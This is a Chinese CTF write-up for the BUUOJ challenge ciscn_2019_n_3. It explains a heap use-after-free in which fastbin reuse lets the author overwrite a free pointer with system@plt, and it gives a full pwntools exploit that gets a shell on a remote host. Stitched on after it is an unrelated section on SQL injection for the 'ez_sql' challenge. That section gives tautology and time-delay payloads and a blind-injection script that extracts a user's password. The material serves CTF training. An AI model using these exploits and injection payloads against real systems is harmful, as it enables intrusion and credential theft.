[BUUOJ] ciscn_2019_n_3

本文详细解析了UAF(Use After Free)漏洞的原理与利用方式,通过实例展示了如何利用fastbin机制控制堆块,修改free指针指向system@plt实现getshell。文章提供了完整的exp代码,适用于信息安全领域的学习与研究。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

这里写自定义目录标题

漏洞点

可以看到主要就是在free的时候没有将相应的数组里的置0,可以导致UAF的漏洞:
ALT

漏洞利用

由于本题将printf和free函数的指针都放在了申请的堆上,而且程序调用了system函数因此我们就不用泄露libc基址了,我们的目标就是取得对存放指针的堆块的控制。
我们可以利用fastbin的LIFO的机制,取得对存放指针的堆块的控制,修改free指针指向system@plt,可以getshell

#0号堆块 (string)0xc 0x38
#1号堆块(int) 0xc
我们释放0和1号堆块,再申请0xc大小的string的堆块
#2号堆块 (string) 0xc 0xc
此时原本0号堆块的存放print和free指针的堆块已经可以被我们修改,直接修改为“dash”加system的地址。之所以在前面加dash是因为我们会多输入一个‘\x0a’即换行符导致指针会指向dash处。

exp

from pwn import *

p = process("./ciscn_2019_n_3")
context.log_level = 'debug'
context.arch = 'x86'
rmt = "node2.buuoj.cn.wetolink.com"
port = 28717
p = remote(rmt,port)
elf = ELF("ciscn_2019_n_3")
def newnote(idx,type,value,length=0):
    p.recvuntil("CNote > ")
    p.sendline(str(1))
    p.recvuntil("Index > ")
    p.sendline(str(idx))
    p.recvuntil("Type > ")
    p.sendline(str(type))
    if type == 1:
        p.recvuntil("Value > ")
        p.sendline(str(value))
    else:
            p.recvuntil("Length > ")
            p.sendline(str(length))
            p.recvuntil("Value > ")
            if length == 8:
                p.send(value)
            else:
                p.sendline(value)
def delnote(idx):
    p.recvuntil("CNote > ")
    p.sendline(str(2))
    p.recvuntil("Index > ")
    p.sendline(str(idx))
def shownote(idx):
    p.recvuntil("CNote > ")
    p.sendline(str(3))
    p.recvuntil("Index > ")
    p.sendline(str(idx))
if __name__ == "__main__":
    newnote(0,2,'a'*10,0x88)
    newnote(1,2,'a'*10,0x38)
    #gdb.attach(p)
    newnote(2,1,0x41)
    #newnote(2,2,'b'*10,0x38)
    delnote(1)
    delnote(2)
    newnote(3,2,'bash'+p32(elf.plt['system']),0xc)
    #gdb.attach(p)
    newnote(4,2,"/bin/sh\x00",0x38)
    delnote(1)

    p.interactive()
### 关于BUUOJ平台上的 `ez_sql` 题目解析 在BUUOJ平台上,`ez_sql` 是一道经典的SQL注入练习题。这类题目通常旨在测试参赛者对于SQL语句构造的理解以及如何利用输入验证漏洞来获取数据库中的敏感数据。 #### SQL注入基础原理 SQL注入是一种常见的安全漏洞,攻击者通过向应用程序提交恶意的SQL代码片段,从而改变原本预期执行的查询逻辑[^1]。这种技术可以用来绕过身份认证、读取敏感数据或者破坏数据库结构。 针对 `ez_sql` 这类挑战的具体解决方法如下: #### 利用布尔盲注提取信息 如果目标应用返回的结果页面会因为不同的条件而有所变化,则可以通过发送一系列精心设计的请求逐步推断出隐藏的信息。例如,在登录界面尝试使用 `' OR '1'='1 --` 的方式强制让WHERE子句恒成立以实现未授权访问[^2]。 #### 时间延迟法探测字符 当无法直接观察到反馈差异时,可采用基于时间的盲注技巧。这涉及到构建能使服务器响应变慢(取决于特定条件下触发sleep函数)的payloads, 如 `IF(SUBSTRING(@@version,1,1)=5,SLEEP(5),0)` 来判断MySQL版本号的第一个数字是否为5[^3]。 以下是Python脚本的一个简单例子用于自动化上述过程的一部分: ```python import requests from string import digits, ascii_lowercase url = "http://example.com/login" charset = digits + ascii_lowercase result = '' for i in range(1, 21): found_char = False for char in charset: payload = f"' AND (SELECT SUBSTR(password,{i},1) FROM users WHERE id=1)='{char}'-- " data = {'username': payload, 'password':'random'} response = requests.post(url, data=data) if "Welcome" in response.text: result += char print(f"[+] Found character {char} at position {i}") found_char = True break if not found_char: break print("[*] Final password:", result) ``` 此代码仅作为学习用途展示可能的技术手段,请勿非法入侵任何系统!
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值